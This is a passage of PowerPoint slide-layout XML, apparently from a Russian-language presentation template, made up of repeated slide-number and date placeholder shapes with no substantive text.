            <a:fld id="{1AEBD19D-72CF-4866-894C-1D9E15F1C418}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="46"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 12">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="47"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{06E10AB3-1406-44A9-8FB1-EBE257E7CC7F}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="48"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 13">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="49"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1C3C293B-6FC6-48CF-BE1F-611FCA5FB054}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="50"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 14">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181"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82"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 name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="51"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{262BFE84-AD94-4CA4-911B-5A1BF4135E7C}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="52"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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15">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="53"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{AEC38B1B-E82D-4E49-A38C-6D8B57AF0724}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="54"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 16">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="192"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93"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94"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sldNum" idx="55"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{AB83A1D6-2B99-4630-8291-636FD3AF2DF4}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="56"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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17">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="57"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{26CFE128-DB11-4156-B659-FD0E7D2F755B}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="58"/>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Вертикальный заголовок и текст">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{03243F87-7F9B-4D39-A35D-915E97E6C530}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 18">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="202"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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="59"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{FB1E0E2B-207E-4F52-BB0E-B8D78F05AAFA}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="60"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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19">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="61"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{E6A5D8E4-A89B-4D13-9ACA-7F3BD15E47ED}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="62"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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20">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="63"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{970BB2B6-9D9A-4953-BA2F-25A790347EC7}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="64"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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21">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="65"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{2E2E329F-62DD-4002-B553-D28E8CD03D13}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="66"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 22">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216"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17"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sldNum" idx="67"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5CDCDEBF-1854-4462-A5CD-363B80F466E3}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="68"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 23">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="69"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{6980EFDE-E280-47C9-B2FD-F61B576B3753}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="70"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>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Обычный 24">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="71"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{9A2BD428-80F4-4714-BCF2-FDEEF36798BA}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="72"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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Обычный 25">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229"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30"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 name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="73"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{E924C8F8-14D3-4EB4-B87A-69F25F0B8A84}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="74"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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26">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="75"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{001282F4-271F-4E57-B774-A465F4343EF6}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="76"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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Обычный 27">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240"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41"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42"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sldNum" idx="77"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{DC6F5DA9-5FCD-4D3D-8D06-D97992328C4D}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="78"/>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Заголовок и объект">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0"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 name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{A880006E-2557-45BB-A594-3103B185F2A4}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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28">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="79"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{52DF4A60-1A2D-4D3D-8275-196CD57F9CAF}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="80"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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Обычный 29">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="250"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 name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="81"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{EED04C48-6BCF-4D63-ADD9-51E72FBA0FBA}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="82"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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30">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="83"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{51FF9EF1-DC5A-48D3-965C-597B33D0840E}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="84"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t/>
            </a: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31">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="85"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{5755FB82-AD9F-45E0-A0F7-16A353EB4B3A}" type="slidenum">
              <a:t>&lt;#&gt;</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="PlaceHolder 2"/>
          <p:cNvSpPr>
